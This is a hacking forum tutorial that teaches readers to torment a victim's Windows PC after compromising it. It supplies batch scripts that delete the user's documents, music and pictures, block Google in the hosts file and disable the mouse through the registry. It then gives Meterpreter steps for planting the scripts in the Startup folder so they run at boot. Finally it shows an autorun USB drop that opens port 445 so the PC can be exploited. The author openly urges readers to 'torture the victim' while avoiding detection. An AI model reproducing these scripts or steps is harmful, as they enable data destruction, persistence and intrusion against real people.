Hack Like an Elite: Batch Scripting for Malicious Purposes: PART 3 (The Main One)

At last, what you all finally waited for!
Hi! Fire Crackers,

Welcome to my 7th post (Part-3), this tutorial will explain about some situations and how to make the Victim's Life like Hell! And fill his system with Malware.

#1 Situation: After Exploiting...

• Go ahead and exploit the Victim's PC.

Step 1: Ready Your Weapons:

Let me Supply you some (Real) Ammo:

------------Copied From here BUT, edited, + added my own-----------

Go to that site and choose your weapons and ammo.

Some explanation:

1) Block Google.
Code:
@echo off
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 www.google.com >> "Hosts"
-----------

It adds this Domain/Website name to the hosts folder, and any-website contained in this folder gets blocked (In simple words)

2) Change time:
Code:
@echo off
time 00:00
----------
I didn't like it but its quite freaky!

3) Delete My Pictures , Documents etc...
Code:
@echo off
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
del /f /q "C:\Users\%userprofile%\My Music\*.*"
del /f /q "C:\Users\%userprofile%\My Pictures\*.*"
---------

• del means delete.
• /f is a switch, which force deletes the files, if they are read-only.
• /q is a switch, which quietly deletes the files without any prompts.
• *.* to delete all the items in the current directory.

4) Swap Mouse Button:
Code:
@echo off
Rundll32 user32,SwapMouseButton
----------
An easy scripts, that changes the setting of mouse from control panel.

5) Disable Mouse:
Code:
@echo off
set key="HKEYLOCALMACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4_
---------------

Complicated Script, Edits the registry settings for mouse, By navigating to its folder and editing DWORD (+ other values.)

If you need more scripts, but can't understand the meaning then, ask me in the comments section

Step 2: Let's Start the Upload Process:

I have exploited the PC, on WAN with static IP as my NET Connection is Slightly faster, but I highly recommend to do this on LAN, because Uploading will take Hours Until the Victim's as well as the attackers connection Speed is FAST!

After the Meterpreter Prompt:

• FIRST, Download all the important, information you need, before it gets deleted by these scripts.
• Copy those scripts above and paste then in notepad and save them with the extension .bat
• Now it's time to upload them, all!
• You can also make your own scripts like of aggravating messages etc. (which will Welcome the user at start-up with the word "DIE".
• Save all the scripts with the name, a,b,c,d,e (.bat) respectively.

• Move these scripts to the root directory of Kali (the host)
• Type: (In the meterpreter:)
• cd /
• ls
• cd Users/%pf%/AppData/Roaming/Microsoft/Windows/"Start Menu"/Programs/Startup

• Upload a.bat
• Upload b.bat
• Upload c.bat
• Upload d.bat
• Upload e.bat

On the victim's Side:

Step 3: Upload Finished, Let the Victim Enjoy!

• These Scrips will execute as soon as the Victim's system is Started/Re-Started
• I am not going to show you how to make scripts that send victim's Log Data Through FTP, because you can simply use the download command or in-build Kali meterpreter commands/modules.
• Don't use scripts like the Folder Bomber etc, or the victim will become suspicious and format his PC.
• Now. I hope you can make scripts that slowly eat RAM in the background, use Task Scheduler etc...
• Also, don't use scripts that FORMATs his/her PC, in other words,
• Torture the Victim, don't just simply Kill him!
• And my work for this situation is done here.
• Victim can use safe mode to counter this, but can have a hard time finding it in Windows 8.

#2 Situation: For the Exploit

You can use batch scripts, for even exploiting the PC!
BUT
You need a physical access to the PC, (or Convince the Victim to open the script.)
Follow:

• Copy this script:

-----------------
@echo off
netsh firewall set portopening tcp 445 smb enable
-----------------
(NOT Tested)
Cause:Opens the specified port and make the victim, Vulnerable.
(Open all the vulnerable ports)

• Save it as anything.bat
• Make an autorun file:

--------------------
[autorun]
open=anything.bat
Icon=anything.ico
---------------------

• Save it as autorun.inf.
• Put them in a Flash/Pen Drive. Connect this drive to the victims PC for about five seconds, and pull it out.
• Done! (No one knows what you just did!)
• Exploit and have Fun!

Remember!

• Batch scripts can be easily opened/edited and read by anyone, it's better to convert them to .exe (executable files)
• Some Batch files may need Admin Permission.
• So, you can manually execute them by going into the shell and navigating to the correct directory and typing start whatever.bat
• Situation 2, may not work if the auto-run is disabled.
• And try some more Disables: Here

Good-Bye!

I hope you had Fun today!
The Final part of Batch, will be about Protection using Batch!
Until then ByE.

Keep Coming for More!

Thank You,
F.E.A.R.